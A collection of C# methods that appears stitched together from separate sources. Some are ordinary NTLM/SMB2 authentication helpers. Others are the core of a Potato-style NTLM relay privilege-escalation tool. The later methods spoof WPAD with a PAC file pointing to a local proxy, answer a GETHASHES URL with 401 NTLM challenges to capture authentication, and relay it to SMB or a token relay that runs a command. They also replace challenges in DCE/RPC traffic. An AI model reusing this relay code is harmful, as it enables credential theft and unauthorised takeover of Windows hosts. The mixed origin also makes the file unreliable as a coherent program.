public byte[] GetChallengeMessageBytes(byte[] negotiateMessageBytes) { byte[] challengeMessageBytes = SSPIHelper.GetType2Message(negotiateMessageBytes, out m_serverContext); ChallengeMessage message = new ChallengeMessage(challengeMessageBytes); m_serverChallenge = message.ServerChallenge; return(challengeMessageBytes); }
public SMB2_SessionSetupResponse SendSessionSetupRequests(NetworkCredential optionalCredential = null) { SSPIHelper MyHelper = new SSPIHelper(_server); if (optionalCredential != null) { MyHelper.LoginClient(optionalCredential); } byte[] ServerSSPIPacket = null; byte[] ClientSSPIPacket; byte[] MIC = null; bool bContinueProcessing = true; while (bContinueProcessing) { MyHelper.InitializeClient(out ClientSSPIPacket, ServerSSPIPacket, out bContinueProcessing); if (!bContinueProcessing) { byte[] temp; MyHelper.SignMessage(mechTypes, out temp); MIC = new byte[temp.Length - mechTypes.Length]; Array.Copy(temp, mechTypes.Length, MIC, 0, temp.Length - mechTypes.Length); sessionkey = MyHelper.GetSessionKey(); } var packet = BuildSessionSetupPacket(ClientSSPIPacket, MIC); SendPacket(packet); Trace.WriteLine("SessionSetup Packet sent"); var answer = ReadPacket(); var header = ReadSMB2Header(answer); Trace.WriteLine("SessionSetup Packet received"); if (header.Status == 0) { return(ReadResponse <SMB2_SessionSetupResponse>(answer)); } if (header.Status != STATUS_MORE_PROCESSING_REQUIRED) { Trace.WriteLine("Checking " + _server + "Error " + header.Status); throw new Win32Exception((int)header.Status); } if (!bContinueProcessing) { Trace.WriteLine("Checking " + _server + "Error " + header.Status + " when no processing needed"); throw new Win32Exception((int)header.Status, "Unexpected SessionSetup error"); } var sessionSetupResponse = ReadResponse <SMB2_SessionSetupResponse>(answer); _sessionid = header.SessionId; // extract SSP answer from GSSPAPI answer ServerSSPIPacket = ExtractSSP(answer, sessionSetupResponse); } throw new NotImplementedException("Not supposed to be here"); }
public KerberosAuthenticator(string hostname, NetworkCredential credential, string principal) { if (credential == null) { _username = Environment.UserName + "@" + System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName.ToUpper(); } else { _username = credential.UserName + "@" + credential.Domain; } _sspi = new SSPIHelper(hostname, credential, principal); }
public byte[] GenerateServerChallenge() { NegotiateMessage negotiateMessage = new NegotiateMessage(); negotiateMessage.NegotiateFlags = NegotiateFlags.NegotiateUnicode | NegotiateFlags.NegotiateOEM | NegotiateFlags.RequestTarget | NegotiateFlags.NegotiateSign | NegotiateFlags.NegotiateSeal | NegotiateFlags.NegotiateLanManagerKey | NegotiateFlags.NegotiateNTLMKey | NegotiateFlags.NegotiateAlwaysSign | NegotiateFlags.NegotiateVersion | NegotiateFlags.Negotiate128 | NegotiateFlags.Negotiate56; negotiateMessage.Version = Authentication.Version.Server2003; byte[] negotiateMessageBytes = negotiateMessage.GetBytes(); byte[] challengeMessageBytes = SSPIHelper.GetType2Message(negotiateMessageBytes, out m_serverContext); ChallengeMessage challengeMessage = new ChallengeMessage(challengeMessageBytes); m_serverChallenge = challengeMessage.ServerChallenge; return(m_serverChallenge); }
/// <summary> /// Note: The 'limitblankpassworduse' (Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa) /// will cause AcceptSecurityContext to return SEC_E_LOGON_DENIED when the correct password is blank. /// </summary> public User Authenticate(string accountNameToAuth, byte[] lmResponse, byte[] ntlmResponse) { if (accountNameToAuth == String.Empty || (String.Equals(accountNameToAuth, "Guest", StringComparison.InvariantCultureIgnoreCase) && IsPasswordEmpty(lmResponse, ntlmResponse) && this.EnableGuestLogin)) { int guestIndex = IndexOf("Guest"); if (guestIndex >= 0) { return(this[guestIndex]); } return(null); } int index = IndexOf(accountNameToAuth); if (index >= 0) { // We should not spam the security event log, and should call the Windows LogonUser API // just to verify the user has a blank password. if (!AreEmptyPasswordsAllowed() && IsPasswordEmpty(lmResponse, ntlmResponse) && LoginAPI.HasEmptyPassword(accountNameToAuth)) { throw new EmptyPasswordNotAllowedException(); } AuthenticateMessage authenticateMessage = new AuthenticateMessage(); authenticateMessage.NegotiateFlags = NegotiateFlags.NegotiateUnicode | NegotiateFlags.NegotiateOEM | NegotiateFlags.RequestTarget | NegotiateFlags.NegotiateSign | NegotiateFlags.NegotiateSeal | NegotiateFlags.NegotiateLanManagerKey | NegotiateFlags.NegotiateNTLMKey | NegotiateFlags.NegotiateAlwaysSign | NegotiateFlags.NegotiateVersion | NegotiateFlags.Negotiate128 | NegotiateFlags.Negotiate56; authenticateMessage.UserName = accountNameToAuth; authenticateMessage.LmChallengeResponse = lmResponse; authenticateMessage.NtChallengeResponse = ntlmResponse; authenticateMessage.Version = Authentication.Version.Server2003; byte[] authenticateMessageBytes = authenticateMessage.GetBytes(); bool success = SSPIHelper.AuthenticateType3Message(m_serverContext, authenticateMessageBytes); if (success) { return(this[index]); } } return(null); }
/// <summary> /// Note: The 'limitblankpassworduse' (Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa) /// will cause AcceptSecurityContext to return SEC_E_LOGON_DENIED when the correct password is blank. /// </summary> public User Authenticate(byte[] authenticateMessageBytes) { AuthenticateMessage message = new AuthenticateMessage(authenticateMessageBytes); if ((message.NegotiateFlags & NegotiateFlags.NegotiateAnonymous) > 0 || (String.Equals(message.UserName, "Guest", StringComparison.InvariantCultureIgnoreCase) && IsPasswordEmpty(message) && this.EnableGuestLogin)) { int guestIndex = IndexOf("Guest"); if (guestIndex >= 0) { return(this[guestIndex]); } return(null); } int index = IndexOf(message.UserName); if (index >= 0) { // We should not spam the security event log, and should call the Windows LogonUser API // just to verify the user has a blank password. if (!AreEmptyPasswordsAllowed() && IsPasswordEmpty(message) && LoginAPI.HasEmptyPassword(message.UserName)) { throw new EmptyPasswordNotAllowedException(); } bool success = SSPIHelper.AuthenticateType3Message(m_serverContext, authenticateMessageBytes); if (success) { return(this[index]); } } return(null); }
// public void recvRequest(object sender, HttpRequestEventArgs e) { using (var writer = new StreamWriter(e.Response.OutputStream)) { HttpRequest request = e.Request; HttpResponse response = e.Response; System.Collections.Specialized.NameValueCollection headers = request.Headers; Console.WriteLine("Got Request: " + request.HttpMethod + " " + request.Url.AbsoluteUri.ToString() + "!"); if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put")) { if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES")) { Console.WriteLine("Sending 401..."); if (headers["Authorization"] == null && workingUri == null) { Console.WriteLine("Got request for hashes..."); response.Headers.Add("WWW-Authenticate", "NTLM"); response.StatusCode = 401; state = 0; } else { String authHeader = headers["Authorization"]; byte[] ntlmBlock = getNtlmBlock(authHeader); if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString())) { workingUri = request.Url.AbsoluteUri.ToString(); if (state == 0) { // if (this.enable_token != null) { byte[] out_buffer = null; tokenRelayThread = new Thread(() => sspihelp.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut)); new_ntlmQueueIn.Add(ntlmBlock); tokenRelayThread.Start(); out_buffer = new_ntlmQueueOut.Take(); if (out_buffer != null) { response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(out_buffer)); state = state + 1; response.StatusCode = 401; } } else { smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd)); ntlmQueue.Clear(); smbRelayThread.Start(); ntlmQueue.Enqueue(ntlmBlock); byte[] challenge = null; Config.signalHandlerClient.WaitOne(); challenge = ntlmQueue.Dequeue(); Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge)); if (challenge != null) { response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(challenge)); state = state + 1; response.StatusCode = 401; } } } else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri)) { if (ntlmBlock[8] == 3) { //Console.WriteLine(Convert.ToBase64String(ntlmBlock)); } // if (this.enable_token != null) { new_ntlmQueueIn.Add(ntlmBlock); response.StatusCode = 200; state = state + 1; byte[] checkStatus = new_ntlmQueueOut.Take(); if (checkStatus[0] == 99) { writer.Close(); tokenRelayThread.Abort(); finished.Set(); return; } else { workingUri = null; tokenRelayThread.Abort(); new_ntlmQueueIn = new BlockingCollection <byte[]>(); new_ntlmQueueOut = new BlockingCollection <byte[]>(); sspihelp = new SSPIHelper(); writer.Close(); state = 0; } } else { ntlmQueue.Enqueue(ntlmBlock); Config.signalHandler.Set(); response.StatusCode = 200; state = state + 1; Config.signalHandlerClient.WaitOne(); byte[] checkStatus = ntlmQueue.Dequeue(); if (checkStatus[0] == 99) { writer.Close(); smbRelayThread.Abort(); finished.Set(); return; } else { workingUri = null; smbRelayThread.Abort(); ntlmQueue = new Queue <byte[]>(); smbRelay = new SMBRelay(); writer.Close(); state = 0; } } } } } writer.Close(); return; } /// else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat")) { Console.WriteLine("Spoofing wpad..."); response.StatusCode = 200; String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";"; for (int i = 0; i < wpad_exclude.Length; i++) { responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";"; } responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}"; writer.Write(responseTxt); } else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon")) { Random rnd = new Random(); int sess = rnd.Next(1, 1000000); response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess); Console.WriteLine("Redirecting to target.." + response.Headers["Location"]); response.StatusCode = 302; writer.Close(); } } // else if (request.HttpMethod.ToLower().Equals("propfind")) { if (request.Url.AbsoluteUri.ToString().Contains("http://localhost/test")) { Console.WriteLine("Got PROPFIND for /test... Responding"); response.StatusCode = 207; response.ContentType = "application/xml"; writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>"); writer.Close(); } else { Console.WriteLine("Got PROPFIND for " + request.Url.AbsoluteUri.ToString() + " returning 404"); response.StatusCode = 404; writer.Close(); } } else { Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString() + " replying 404"); response.StatusCode = 404; writer.Close(); } } }
private byte[] doNTLMMagic(byte[] buf) { byte[] ret_bytes = buf; if (tokenRelayThread == null) { SSPIHelper tokenRelay = new SSPIHelper(); tokenRelayThread = new Thread(() => tokenRelay.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut, cmd)); } try { byte[] ntlm_bytes = NTLMExtract(buf); if (ntlm_bytes != null) { if (ntlm_bytes != null) { if (ntlm_bytes[8] == 1) { if (enable_token != null) { Console.WriteLine("GOT TYPE1 MESSAGE TOKEN-RELAY!"); new_ntlmQueueIn.Add(ntlm_bytes); tokenRelayThread.Start(); challenge = new_ntlmQueueOut.Take(); } } else if (ntlm_bytes[8] == 2) { Console.WriteLine("GOT TYPE2 MESSAGE (CHALLENGE) from RPCs"); if (challengeCount > 0 || !dropFirst) { ret_bytes = replaceChallenge(buf, challenge); } challengeCount = challengeCount + 1; } else if (ntlm_bytes[8] == 3) { if (enable_token != null) { Console.WriteLine("GOT TYPE3 MESSAGE (AUTH) TOKEN-RELAY"); new_ntlmQueueIn.Add(ntlm_bytes); byte[] checkStatus = new_ntlmQueueOut.Take(); if (checkStatus[0] == 99) { Thread.Sleep(500); // Incase its not finished! tokenRelayThread.Abort(); DCERPCNtlmHandler.finished.Set(); // this.disconnected.Set(); } else { new_ntlmQueueIn = new BlockingCollection <byte[]>(); new_ntlmQueueOut = new BlockingCollection <byte[]>(); challengeCount = 0; tokenRelayThread = null; } } } } } } catch (Exception e) { Console.WriteLine(e); return(ret_bytes); } return(ret_bytes); }